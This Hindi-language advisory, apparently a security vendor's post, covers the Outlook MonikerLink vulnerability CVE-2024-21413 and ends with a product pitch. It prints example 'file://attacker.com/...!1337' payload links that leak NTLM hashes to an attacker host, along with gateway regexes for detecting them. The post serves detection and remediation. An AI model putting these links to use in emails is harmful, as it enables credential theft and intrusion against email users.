CVE-2024-21413: Microsoft Outlook MonikerLink RCE
"MonikerLink" नाम की यह CVE-2024-21413 एक क्रिटिकल Microsoft Outlook भेद्यता है जो सिर्फ़ एक दुर्भावनापूर्ण ईमेल को प्रीव्यू करने भर से Protected View को बायपास करके रिमोट कोड एक्ज़ीक्यूशन और NTLM क्रेडेंशियल चोरी हासिल कर लेती है। CVSS 9.8 क्रिटिकल। ईमेल प्रीव्यू के अलावा किसी यूज़र इंटरैक्शन की ज़रूरत नहीं।
| विशेषता | मान |
|---|---|
| CVE ID | CVE-2024-21413 |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20: अनुचित इनपुट वैलिडेशन |
| प्रकाशित | 13 फ़रवरी 2024 |
| शोषण | सार्वजनिक PoC — व्यापक रूप से शोषित |
CVE-2024-21413 क्या है?
CVE-2024-21413 उस तरीक़े का शोषण करता है जिससे Microsoft Outlook उन हाइपरलिंक को हैंडल करता है जिनमें ! (विस्मयादिबोधक चिह्न) फ़ाइल मॉनिकर URI के हिस्से के रूप में शामिल होता है। सामान्यतः, Outlook ईमेल से खोले गए डॉक्यूमेंट पर "Protected View" लागू करता है — कोड एक्ज़ीक्यूशन रोकने के लिए Office डॉक्यूमेंट को सैंडबॉक्स करता है। यह भेद्यता उस सुरक्षा को पूरी तरह बायपास कर देती है।
इस फ़ॉर्मैट में एक हाइपरलिंक बनाकर file://ATTACKER-SERVER/test.rtf!something, हमलावर Outlook को बिना Protected View के RTF फ़ाइल खोलने पर मजबूर कर देता है, और साथ ही हमलावर के SMB सर्वर पर एक स्वचालित NTLM ऑथेंटिकेशन प्रयास ट्रिगर हो जाता है। हमलावर ऑफ़लाइन क्रैकिंग या रिले हमलों के लिए NTLMv2 हैश कैप्चर कर लेता है।
🚨 प्रीव्यू पेन हमला — किसी क्लिक की ज़रूरत नहीं
यह भेद्यता Outlook Preview Pane में ट्रिगर होती है। पीड़ित को बस अपने इनबॉक्स में ईमेल चुनना भर होता है — किसी अटैचमेंट को खोलने या लिंक पर क्लिक करने की ज़रूरत नहीं। किसी कॉर्पोरेट माहौल में, किसी डिस्ट्रीब्यूशन-लिस्ट को भेजा गया एक भी फ़िशिंग ईमेल एक साथ सैकड़ों NTLMv2 हैश भंग कर सकता है।
प्रभावित प्रोडक्ट
| प्रोडक्ट | प्रभावित वर्ज़न |
|---|---|
| Microsoft Outlook 2016 | फ़रवरी 2024 अपडेट से पहले |
| Microsoft Outlook 2019 | फ़रवरी 2024 अपडेट से पहले |
| Microsoft Outlook LTSC 2021 | फ़रवरी 2024 अपडेट से पहले |
| Microsoft 365 Apps for Enterprise | फ़रवरी 2024 अपडेट से पहले |
प्रभावित नहीं: Outlook on the web (OWA), Outlook for iOS/Android, Outlook for Mac। यह भेद्यता विशेष रूप से Windows डेस्कटॉप Outlook क्लाइंट तक सीमित है।
हमले की तकनीक: MonikerLink विधि
Windows COM (Component Object Model) नाम से ऑब्जेक्ट से बाइंड करने के लिए "मॉनिकर" का उपयोग करता है। file:// URI स्कीम Windows में ! अक्षर के बाद एक मॉनिकर कंपोनेंट शामिल कर सकती है, जो Windows को संदर्भित COM ऑब्जेक्ट लोड और सक्रिय करने का निर्देश देता है।
# Normal file link — Protected View applied file://attacker.com/share/document.rtf # MonikerLink bypass — ! bypasses Protected View file://attacker.com/share/document.rtf!1337 # When Outlook processes the MonikerLink: # 1. Attempts SMB connection to attacker.com # 2. Sends NTLMv2 authentication (captures hash) # 3. Opens file without Protected View # 4. If file is malicious RTF → RCE
NTLM हैश कैप्चर फ़्लो
एक हथियारयुक्त RTF फ़ाइल के बिना भी, NTLM रिले हमला प्रभावी होता है:
- पीड़ित Outlook में दुर्भावनापूर्ण ईमेल प्रीव्यू करता है
- Outlook हमलावर-नियंत्रित सर्वर से स्वचालित SMB कनेक्शन बनाता है
- Windows ऑथेंटिकेट करने के लिए NTLMv2 चैलेंज-रिस्पॉन्स (हैश) भेजता है
- हमलावर Responder, Impacket, या समान टूल से हैश कैप्चर करता है
- हैश ऑफ़लाइन क्रैक किया जाता है (कमज़ोर पासवर्ड घंटों में) या रीयल-टाइम में दूसरी सर्विस को रिले किया जाता है
असल-दुनिया शोषण
सार्वजनिक PoC जारी होने के बाद, CVE-2024-21413 कुछ ही दिनों में कमर्शियल फ़िशिंग टूलकिट में शामिल कर लिया गया। देखे गए कैंपेन में शामिल थे:
- कॉर्पोरेट क्रेडेंशियल हार्वेस्टिंग: बड़ी मात्रा में NTLM हैश कैप्चर करने के लिए एंटरप्राइज़ डिस्ट्रीब्यूशन-लिस्ट को भेजे गए बल्क ईमेल
- लक्षित इनिशियल एक्सेस: MonikerLink पेलोड वाले कस्टमाइज़्ड ईमेल से एग्ज़िक्यूटिव को स्पीयर-फ़िशिंग करना
- लेटरल मूवमेंट चेन: कैप्चर किए गए हैश से इंटरनल सर्विस (SMB, LDAP, HTTP) तक NTLM रिले
- बिज़नेस ईमेल कॉम्प्रोमाइज़: BEC फ़्रॉड के लिए मेलबॉक्स एक्सेस सक्षम करने वाली क्रेडेंशियल हार्वेस्टिंग
पहचान
ईमेल गेटवे नियम
# Regex pattern for MonikerLink in email body/attachments # Detect file:// links containing ! character \bfile:\/\/[^\s"']+![^\s"']* # Block external UNC/file links entirely (recommended) \bfile:\/\/[^\s"']+ \\\\[a-z0-9.-]+\\
नेटवर्क पहचान
- एंडपॉइंट वर्कस्टेशन से बाहरी IP एड्रेस को SMB कनेक्शन (कभी नहीं होना चाहिए)
- अप्रत्याशित डेस्टिनेशन IP को NTLMv2 ऑथेंटिकेशन प्रयास
- मेल क्लाइंट से हमलावर-नियंत्रित डोमेन के लिए DNS क्वेरी
एंडपॉइंट पहचान
- OUTLOOK.EXE द्वारा शुरू किए गए आउटबाउंड TCP/445 कनेक्शन
- ईमेल प्रीव्यू के बाद Office प्रोसेस द्वारा चाइल्ड प्रोसेस स्पॉन करना
- Office प्रोसेस से LSASS एक्सेस
सुधार
- फ़रवरी 2024 पैच लागू करें: Outlook के लिए Microsoft सुरक्षा अपडेट Protected View बायपास को ठीक करता है
- परिधि पर आउटबाउंड SMB ब्लॉक करें: TCP/445 और TCP/139 आउटबाउंड को ब्लॉक करने वाले फ़ायरवॉल नियम, भेद्यता ट्रिगर होने पर भी NTLM हैश कैप्चर को रोकते हैं
- NTLM रिले सुरक्षा सक्षम करें: रिले हमलों को रोकने के लिए SMB सिग्निंग और LDAP सिग्निंग कॉन्फ़िगर करें
- ईमेल सुरक्षा गेटवे डिप्लॉय करें: उन ईमेल को ब्लॉक करें जिनमें बॉडी और अटैचमेंट में
file://और\\(UNC पाथ) लिंक हों - जहाँ संभव हो, NTLM अक्षम करें: Kerberos इस्तेमाल करने वाले संगठन हैश-कैप्चर हमला-पथ ख़त्म करने के लिए NTLM अक्षम कर सकते हैं
💡 डिफ़ेंस इन डेप्थ: भले ही आपने Outlook पैच कर दिया हो, फ़ायरवॉल पर आउटबाउंड SMB ब्लॉक करना एक बेस्ट प्रैक्टिस है जो हमलों की इस पूरी श्रेणी को रोकती है। कई संगठन लेगेसी फ़ाइल-शेयरिंग कारणों से आउटबाउंड SMB की अनुमति देते हैं — इसे तुरंत ऑडिट करें और प्रतिबंधित करें।
KENSAI पहचान क्षमता
- ईमेल क्लाइंट वर्ज़न इन्वेंट्री: KENSAI आपके पूरे संगठन में Outlook वर्ज़न की पहचान करता है, CVE-2024-21413 के प्रति भेद्य अनपैच्ड वर्ज़न को फ़्लैग करता है
- फ़िशिंग सिमुलेशन: KENSAI का फ़िशिंग-आकलन मॉड्यूल MonikerLink-शैली के लालच के प्रति कर्मचारियों की संवेदनशीलता का परीक्षण कर सकता है
- नेटवर्क एक्सपोज़र विश्लेषण: वर्कस्टेशन से आउटबाउंड SMB की अनुमति देने वाले मिसकॉन्फ़िगर्ड फ़ायरवॉल की पहचान करता है
- पैच अनुपालन: ज्ञात CVE कवरेज के ख़िलाफ़ Microsoft Office पैच स्तरों की निरंतर मॉनिटरिंग
क्या आपके Outlook क्लाइंट MonikerLink से सुरक्षित हैं?
KENSAI आपके एंडपॉइंट फ़्लीट को भेद्य Outlook वर्ज़न के लिए स्कैन करता है और उन नेटवर्क पथों की पहचान करता है जो NTLM हैश कैप्चर को सक्षम कर सकते हैं। मिनटों में विज़िबिलिटी पाएँ।
अपनी ईमेल अटैक-सतह का आकलन करें →